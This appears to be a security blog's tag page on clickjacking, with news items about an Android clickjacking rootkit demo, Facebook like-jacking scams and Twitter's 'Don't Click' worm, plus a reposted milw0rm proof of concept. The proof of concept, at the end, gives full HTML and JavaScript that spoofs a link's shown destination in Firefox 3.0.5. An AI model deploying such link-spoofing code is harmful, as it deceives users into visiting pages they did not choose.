Posts tagged: Clickjacking

Jul 05 2012

Android Clickjacking Rootkit Demonstrated

ClickJackingA team of security researchers have demonstrated how a security flaw in Android 4.0.4 can be exploited by a clickjacking rootkit.

The research team is lead by North Carolina State University professor Xuxian Jiang, who succeeded in developing a proof-of-concept rootkit that attacks the Android framework as opposed to the underlying operating system kernel. The researchers contend that such a rootkit could potentially be downloaded with an infected app and be used to manipulate the smartphone.

In the video, the demonstrator was able to hide applications on the device, as well as get them to launch when icons for other applications are clicked. If downloaded with an infected application, the rootkit could for example hide the smartphone’s browser and replace it with a browser that looks exactly the same but actually steals all of the user’s information.

Feb 22 2011

Facebook ClickJacking : Malware takes on new Italian disguises

Facebook users have been subjected to clickjacking attacks that force them to authorize actions they had no intention of approving.

The latest few campaigns seen by SophosLabs, for instance, target Italian users of the social network.
Facebook clickjacking

COCA COLA: Dopo aver visto questo video non berrò più coca cola. Svelata la ricetta segreta. Guarda il video verita

Which translates as: “COCA COLA: After watching this video you won’t drink Coca Cola. The secret recipe revealed. Watch the video truth.”
Facebook clickjacking

LO SCHERZO DI SAN VALENTINO CHE STA FACENDO IL GIRO DEL MONDO! TE RETO A VER ESTA PAGINA PARA 5 SEGUNDOS SIN REIRTE

Which translates as: “THE VALENTINE’S DAY JOKE THAT IS GOING AROUND THE WORLD! I CHALLENGE YOU TO VIEW THIS PAGE FOR 5 SECONDS WITHOUT LAUGHING.”

All of these Facebook scams use clickjacking techniques to trick the user into “liking” them.

SophosLabs is intercepting the suspicious pages as Mal/FBJack-A.

Facebook users can protect themselves from clickjacking threats like this by using browser plugins such as NoScript for Firefox.

NoScript

Source: NakedSecurity | Sophos

Feb 15 2009

Twitter hit with ‘Don’t Click’ clickjacking attack

Twitter stopped a clickjacking attack on Thursday that quickly spread because it took advantage of social engineering and peoples’ natural curiosity.

Tweets began appearing that said “Don’t Click” followed by a link. Naturally, people clicked. When they did so, a tweet was sent from their account with the same “Don’t Click” message and link.

“We patched the “don’t click” clickjacking attack 10 minutes ago. Problem should be gone,” John Adams, aka Netik, an operations engineer at Twitter, tweeted around 11 a.m. PST.

The clickjacking appeared to be harmless and just propagated itself, according to a post on the Sunlight Labs blog.

The code “creates an iframe of the page, hides it, and when you click that button and you’re logged into Twitter, it makes you post that message (even though you don’t see it). There’s not a bit of JavaScript involved. The only JavaScript on the page is their Google Analytics code,” the Sunlight Labs post says.

Source : CNet
http://news.cnet.com/8301-1009_3-10162812-83.html

Jan 22 2009

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking
===========================================

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://www.milw0rm.com’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<center>
<br>
<font style=”font-family:arial;font-size:32px”>Status Bar Obfuscation
/ Clickjacking</font><br>
<font style=”font-family:arial;font-size:24px”>By MrDoug</font><br>
<br>
<hr size=”3″ width=”500″ color=”#000000″>
<br>
<font style=”font-family:arial;font-size:20px”>Click the VALID link to
google below to visit milw0rm.com</font><br>
<br>
<a href=”http://www.google.com” onclick=”updatebox(event)”><font
style=”font-family:arial;font-size:32px”>http://www.google.com</font></a><br>
<br>
<hr size=”3″ width=”500″ color=”#000000″>
<br>
<font style=”font-family:arial;font-size:16px”>Greetz to Slappywag</font><br>
</center>
<div style=”position:absolute;bottom:0;”>
<font style=”font-family:arial;font-size:32px”>Note this…<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>

===========================================
MrDoug
mrdoug13[at]gmail[dot]com

# milw0rm.com [2009-01-21]